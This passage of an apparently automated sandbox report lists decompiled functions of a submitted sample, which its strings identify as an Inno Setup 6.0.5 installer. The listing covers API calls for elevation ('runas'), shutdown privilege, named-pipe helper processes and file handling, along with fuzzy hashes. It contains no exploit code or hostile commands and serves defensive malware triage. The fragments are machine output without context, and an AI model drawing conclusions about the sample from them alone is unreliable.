                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocVirtual
                                                                                    • String ID:
                                                                                    • API String ID: 4275171209-0
                                                                                    • Opcode ID: d39b22df79555fe4438253863038b616525278bed3867586134d7713ba648576
                                                                                    • Instruction ID: f9c7199d2a20b3d4535cb586bdcc75df61911083c239a6e183f6db4c37c8fba7
                                                                                    • Opcode Fuzzy Hash: d39b22df79555fe4438253863038b616525278bed3867586134d7713ba648576
                                                                                    • Instruction Fuzzy Hash: EBF0A9F2B003214FE714DFB89E41702BBEAE748355F11427EE989EB798D7B09901A784

                                                                                    Non-executed Functions

                                                                                    Function 0061A76C Relevance: 40.4, APIs: 11, Strings: 12, Instructions: 187pipeprocessfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetTickCount.KERNEL32 ref: 0061A7D4
                                                                                    • QueryPerformanceCounter.KERNEL32(?,00000000,0061AA67,?,?,?,00000000,?,0061B466,?,?,00000000), ref: 0061A7DD
                                                                                    • GetSystemTimeAsFileTime.KERNEL32(?,?,00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0061A7E7
                                                                                    • GetCurrentProcessId.KERNEL32(?,?,00000000,0061AA67,?,?,?,00000000,?,0061B466,?,?,00000000), ref: 0061A7F0
                                                                                    • CreateNamedPipeW.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0061A866
                                                                                    • GetLastError.KERNEL32(00000000,40080003,00000006,00000001,00002000,00002000,00000000,00000000), ref: 0061A874
                                                                                    • CreateFileW.KERNEL32(00000000,C0000000,00000000,00661F70,00000003,00000000,00000000,00000000,0061AA23,?,00000000,40080003,00000006,00000001,00002000,00002000), ref: 0061A8BC
                                                                                    • SetNamedPipeHandleState.KERNEL32(000000FF,00000002,00000000,00000000,00000000,0061AA12,?,00000000,C0000000,00000000,00661F70,00000003,00000000,00000000,00000000,0061AA23), ref: 0061A8F5
                                                                                      • Part of subcall function 005B09C4: GetSystemDirectoryW.KERNEL32(?,00000104), ref: 005B09D7
                                                                                    • CreateProcessW.KERNEL32(00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 0061A99E
                                                                                    • CloseHandle.KERNEL32(?,00000000,00000000,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000), ref: 0061A9D4
                                                                                    • CloseHandle.KERNEL32(000000FF,0061AA19,?,00000000,00000000,000000FF,0C000000,00000000,00000000,00000044,?,000000FF,00000002,00000000,00000000,00000000), ref: 0061AA0C
                                                                                      • Part of subcall function 005F84D8: GetLastError.KERNEL32(00000000,005F91EE,00000005,00000000,005F9216,?,?,0066978C,?,00000000,00000000,00000000,?,00650A7F,00000000,00650A9A), ref: 005F84DB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateHandle$CloseErrorFileLastNamedPipeProcessSystemTime$CountCounterCurrentDirectoryPerformanceQueryStateTick
                                                                                    • String ID: 64-bit helper EXE wasn't extracted$Cannot utilize 64-bit features on this version of Windows$CreateFile$CreateNamedPipe$CreateProcess$D$Helper process PID: %u$SetNamedPipeHandleState$Starting 64-bit helper process.$\\.\pipe\InnoSetup64BitHelper-%.8x-%.8x-%.8x-%.8x%.8x$helper %d 0x%x$i
                                                                                    • API String ID: 770386003-3271284199
                                                                                    • Opcode ID: 8b417e6bfe7b416bc203fcebf180cb54b99f1040917cd1cd9b5e41bc12d13ce3
                                                                                    • Instruction ID: 3503b57a197a75d7cee75c72a57885d42cb6c05f4df10585553db908d6458071
                                                                                    • Opcode Fuzzy Hash: 8b417e6bfe7b416bc203fcebf180cb54b99f1040917cd1cd9b5e41bc12d13ce3
                                                                                    • Instruction Fuzzy Hash: 94713270A003499FEB10DFA9CC45BEEBBF5AB05704F1445A9F508EB392D7749980CB66
                                                                                    Function 0064F1DC Relevance: 37.3, APIs: 4, Strings: 17, Instructions: 562COMMON
                                                                                    Download Yara Rule
                                                                                    Strings
                                                                                    • InitializeUninstall, xrefs: 0064F64B
                                                                                    • Uninstall DAT: , xrefs: 0064F306
                                                                                    • Setup version: Inno Setup version 6.0.5 (u), xrefs: 0064F2D8
                                                                                    • Uninstall command line: , xrefs: 0064F326
                                                                                    • Cannot find utCompiledCode record for this version of the uninstaller, xrefs: 0064F452
                                                                                    • InitializeUninstall returned False; aborting., xrefs: 0064F67E
                                                                                    • Install was done in 64-bit mode but not running 64-bit Windows now, xrefs: 0064F4A8
                                                                                    • Removed all? %s, xrefs: 0064F79F
                                                                                    • Not calling UninstallNeedRestart because a restart has already been deemed necessary., xrefs: 0064F85D
                                                                                    • UninstallNeedRestart, xrefs: 0064F7DF, 0064F81C
                                                                                    • Will restart because UninstallNeedRestart returned True., xrefs: 0064F82E
                                                                                    • Event, xrefs: 0064F57B
                                                                                    • DeinitializeUninstall, xrefs: 0064FA0C
                                                                                    • Original Uninstall EXE: , xrefs: 0064F2EB
                                                                                    • Need to restart Windows? %s, xrefs: 0064F880
                                                                                    • Will not restart Windows automatically., xrefs: 0064F962
                                                                                    • Uninstall, xrefs: 0064F28B
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$Long$Show
                                                                                    • String ID: Cannot find utCompiledCode record for this version of the uninstaller$DeinitializeUninstall$Event$InitializeUninstall$InitializeUninstall returned False; aborting.$Install was done in 64-bit mode but not running 64-bit Windows now$Need to restart Windows? %s$Not calling UninstallNeedRestart because a restart has already been deemed necessary.$Original Uninstall EXE: $Removed all? %s$Setup version: Inno Setup version 6.0.5 (u)$Uninstall$Uninstall DAT: $Uninstall command line: $UninstallNeedRestart$Will not restart Windows automatically.$Will restart because UninstallNeedRestart returned True.
                                                                                    • API String ID: 3609083571-1139549536
                                                                                    • Opcode ID: 22bf36efd2d9069785d056405695bf985450d9e08495da1d136dca054f8b90b8
                                                                                    • Instruction ID: b395923e521076bf2bceb30747a8197c7c47a38b115d8df3202869f321eb7a22
                                                                                    • Opcode Fuzzy Hash: 22bf36efd2d9069785d056405695bf985450d9e08495da1d136dca054f8b90b8
                                                                                    • Instruction Fuzzy Hash: 4B32AE346046458FD754EF68E891B997BF3FB4A304F105079F900AB3A2CBB4AC85CB55
                                                                                    Function 005B1248 Relevance: 28.2, APIs: 14, Strings: 2, Instructions: 181memoryCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • AllocateAndInitializeSid.ADVAPI32(00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B128A
                                                                                    • GetVersion.KERNEL32(00000000,005B1433,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B12A7
                                                                                    • GetModuleHandleW.KERNEL32(advapi32.dll,CheckTokenMembership,00000000,005B1433,?,00000005,00000002,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B12C1
                                                                                    • FreeSid.ADVAPI32(00000000,005B143A,00000020,00000220,00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000), ref: 005B142D
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: AllocateFreeHandleInitializeModuleVersion
                                                                                    • String ID: CheckTokenMembership$advapi32.dll
                                                                                    • API String ID: 4173726493-1888249752
                                                                                    • Opcode ID: 952df93399f65c742f00ad26f12ea1d2db98546042352c41d8bfdd11bcdf1fbe
                                                                                    • Instruction ID: ac35d0f59487471c61e1a1342d4049f29feb693cc75a8e69d60280a94490ce98
                                                                                    • Opcode Fuzzy Hash: 952df93399f65c742f00ad26f12ea1d2db98546042352c41d8bfdd11bcdf1fbe
                                                                                    • Instruction Fuzzy Hash: 7C519671A44705AADF51DBE58C62BFF7BE8FF05344F90082AFA00E7191E638E9408769
                                                                                    Function 0063DDA4 Relevance: 19.3, APIs: 5, Strings: 6, Instructions: 93COMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                      • Part of subcall function 0063DBC0: GetModuleHandleW.KERNEL32(kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DBEC
                                                                                      • Part of subcall function 0063DBC0: GetFileAttributesW.KERNEL32(00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC05
                                                                                      • Part of subcall function 0063DBC0: CreateFileW.KERNEL32(00000000,00000000,00000007,00000000,00000003,00000000,00000000,00000000,00000000,kernel32.dll,GetFinalPathNameByHandleW), ref: 0063DC2F
                                                                                      • Part of subcall function 0063DBC0: CloseHandle.KERNEL32(00000000), ref: 0063DC4D
                                                                                      • Part of subcall function 0063DCD0: GetCurrentDirectoryW.KERNEL32(00000104,?,00000000,0063DD61,?,00000097,?,?,0063DDDB,00000000,0063DEF3,?,?,00000001), ref: 0063DCFF
                                                                                    • ShellExecuteExW.SHELL32(0000003C), ref: 0063DE2B
                                                                                    • GetLastError.KERNEL32(00000000,0063DEF3,?,?,00000001), ref: 0063DE34
                                                                                    • MsgWaitForMultipleObjects.USER32(00000001,00000000,00000000,000000FF,000004FF), ref: 0063DE81
                                                                                    • GetExitCodeProcess.KERNEL32(00000000,?), ref: 0063DEA7
                                                                                    • CloseHandle.KERNEL32(00000000,0063DED8,00000000,00000000,000000FF,000004FF,00000000,0063DED1,?,00000000,0063DEF3,?,?,00000001), ref: 0063DECB
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Handle$CloseFile$AttributesCodeCreateCurrentDirectoryErrorExecuteExitLastModuleMultipleObjectsProcessShellWait
                                                                                    • String ID: <$GetExitCodeProcess$MsgWaitForMultipleObjects$ShellExecuteEx$ShellExecuteEx returned hProcess=0$runas
                                                                                    • API String ID: 254331816-221126205
                                                                                    • Opcode ID: 34014370f5579deeee9a70eab962f15452e20141bfd9a2655e6417c1dd94800e
                                                                                    • Instruction ID: 19f62c8c6b26142c15b7ccd5ce8ac2d9ded865074aa3ecb0be12b35c3f976091
                                                                                    • Opcode Fuzzy Hash: 34014370f5579deeee9a70eab962f15452e20141bfd9a2655e6417c1dd94800e
                                                                                    • Instruction Fuzzy Hash: 69317671E002099FDB10EFA9E8826EDBAB9FF44704F50057DF514E7391DB7499408B95
                                                                                    Function 0063E56C Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 159windowCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • IsIconic.USER32(?), ref: 0063E5C1
                                                                                    • GetWindowLongW.USER32(?,000000F0), ref: 0063E5DE
                                                                                    • GetWindowLongW.USER32(?,000000EC), ref: 0063E603
                                                                                      • Part of subcall function 005963F8: IsWindow.USER32(?), ref: 00596406
                                                                                      • Part of subcall function 005963F8: EnableWindow.USER32(?,000000FF), ref: 00596415
                                                                                    • GetActiveWindow.USER32 ref: 0063E6CF
                                                                                    • SetActiveWindow.USER32(0065C5D1,0063E737,0063E74D,?,?,000000EC,?,000000F0,00000000,?,00000000), ref: 0063E720
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Window$ActiveLong$EnableIconic
                                                                                    • String ID: D.S$Dc$`$qc
                                                                                    • API String ID: 4222481217-1700508051
                                                                                    • Opcode ID: 105bf1b043794c7febb61f28ddb640e4e5e1409b569c658a6f2acf29d1ee32be
                                                                                    • Instruction ID: a68385297073a1787c46507cafb47a44eecf45f015a0fdb6403bc58eaa920278
                                                                                    • Opcode Fuzzy Hash: 105bf1b043794c7febb61f28ddb640e4e5e1409b569c658a6f2acf29d1ee32be
                                                                                    • Instruction Fuzzy Hash: 64518C74A00249AFDB00DFA9C885ADEBBF6FB09314F154169F804EB391D776A941CFA0
                                                                                    Function 0040C2A0 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 140stringlibraryfileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleW.KERNEL32(kernel32.dll,0041AD90,?,?), ref: 0040C2BD
                                                                                    • GetProcAddress.KERNEL32(00000000,GetLongPathNameW), ref: 0040C2CE
                                                                                    • FindFirstFileW.KERNEL32(?,?,kernel32.dll,0041AD90,?,?), ref: 0040C3CE
                                                                                    • FindClose.KERNEL32(?,?,?,kernel32.dll,0041AD90,?,?), ref: 0040C3E0
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,kernel32.dll,0041AD90,?,?), ref: 0040C3EC
                                                                                    • lstrlenW.KERNEL32(?,?,?,?,?,kernel32.dll,0041AD90,?,?), ref: 0040C431
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: Findlstrlen$AddressCloseFileFirstHandleModuleProc
                                                                                    • String ID: GetLongPathNameW$\$kernel32.dll
                                                                                    • API String ID: 1930782624-3908791685
                                                                                    • Opcode ID: c34afadf3db2e7f96e5d8f57f2f71db68a35707ef3791a46efc30f5c96551beb
                                                                                    • Instruction ID: 129811935084e97536274d2d3cc39016278ad45ca87abc2192b8d5c1b695ba56
                                                                                    • Opcode Fuzzy Hash: c34afadf3db2e7f96e5d8f57f2f71db68a35707ef3791a46efc30f5c96551beb
                                                                                    • Instruction Fuzzy Hash: 8841A471E00518DBCB10EBA4C8C5ADE73B5AF44310F5586BAD504F73C1E778AE458A8D
                                                                                    Function 00CD18A7 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 87windownativethreadCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetModuleHandleA.KERNEL32(00000000,00000000), ref: 00CD18E4
                                                                                    • CreateWindowExW.USER32(00000000,10018410,00000000,50800001,00000014,0000001E,00000159,00000014,00000001,00000065,00000000), ref: 00CD190A
                                                                                    • SendMessageW.USER32(1001C6F0,00000409,00000000,00D77800), ref: 00CD193E
                                                                                    • CreateThread.KERNEL32(00000000,00000000,100019F0,?,00000000,00000000), ref: 00CD1990
                                                                                    • PostQuitMessage.USER32(00000000), ref: 00CD199B
                                                                                    • NtdllDefWindowProc_W.NTDLL(00000002,?,?,?), ref: 00CD19B4
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2077740458.0000000000CD0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00CD0000, based on PE: false
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_cd0000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: CreateMessageWindow$HandleModuleNtdllPostProc_QuitSendThread
                                                                                    • String ID:
                                                                                    • API String ID: 4292518056-3916222277
                                                                                    • Opcode ID: f152b21074a591eaa1c3221d8e4c428642237a9e31c9f3bb9f83192013b01db4
                                                                                    • Instruction ID: 59ac2d4fe5a4cc459e1b54a56f04bed69ab36ee7b51a9f1357a70336514bb746
                                                                                    • Opcode Fuzzy Hash: f152b21074a591eaa1c3221d8e4c428642237a9e31c9f3bb9f83192013b01db4
                                                                                    • Instruction Fuzzy Hash: 05311675A40218FFE700DF94CC99FAA77B9EB48701F248119FA05AB291C770DB01CB65
                                                                                    Function 005FA9A8 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 42shutdownCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • GetCurrentProcess.KERNEL32(00000028), ref: 005FA9B8
                                                                                    • OpenProcessToken.ADVAPI32(00000000,00000028), ref: 005FA9BE
                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,00000028), ref: 005FA9D7
                                                                                    • AdjustTokenPrivileges.ADVAPI32(?,00000000,00000002,00000000,00000000,00000000), ref: 005FA9FE
                                                                                    • GetLastError.KERNEL32(?,00000000,00000002,00000000,00000000,00000000), ref: 005FAA03
                                                                                    • ExitWindowsEx.USER32(00000002,00000000), ref: 005FAA14
                                                                                    Strings
                                                                                    Memory Dump Source
                                                                                    • Source File: 00000000.00000002.2076527370.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                    • Associated: 00000000.00000002.2076414824.0000000000400000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076919391.000000000065D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076938473.000000000065E000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076957697.000000000065F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076974854.0000000000661000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000663000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.0000000000668000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2076991987.000000000066B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077054601.000000000066D000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077076597.000000000066F000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077103034.0000000000670000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    • Associated: 00000000.00000002.2077126725.0000000000672000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                    Joe Sandbox IDA Plugin
                                                                                    • Snapshot File: hcaresult_0_2_400000_leBwnyHIgx.jbxd
                                                                                    Similarity
                                                                                    • API ID: ProcessToken$AdjustCurrentErrorExitLastLookupOpenPrivilegePrivilegesValueWindows
                                                                                    • String ID: SeShutdownPrivilege
                                                                                    • API String ID: 107509674-3733053543
                                                                                    • Opcode ID: 85845749144dc9ce82d9e1a4bab315e58eda8b3d9d64f424d5201a4268532a52
                                                                                    • Instruction ID: 775351c24a523f7ca86ab9856cb2a99195e947980098857579868bc878f92e5d
                                                                                    • Opcode Fuzzy Hash: 85845749144dc9ce82d9e1a4bab315e58eda8b3d9d64f424d5201a4268532a52
                                                                                    • Instruction Fuzzy Hash: D9F062B068430675E610E6718E07FBE2588AB40B48F900C1AF789E50D2E7ADD4588677
                                                                                    Function 00650754 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 89fileCOMMON
                                                                                    Download Yara Rule
                                                                                    APIs
                                                                                    • FindFirstFileW.KERNEL32(00000000,?,00000000,00650891,?,0066978C,?,?,00650A46,00000000,00650A9A,?,00000000,00000000,00000000), ref: 006507A5
                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000010), ref: 00650828
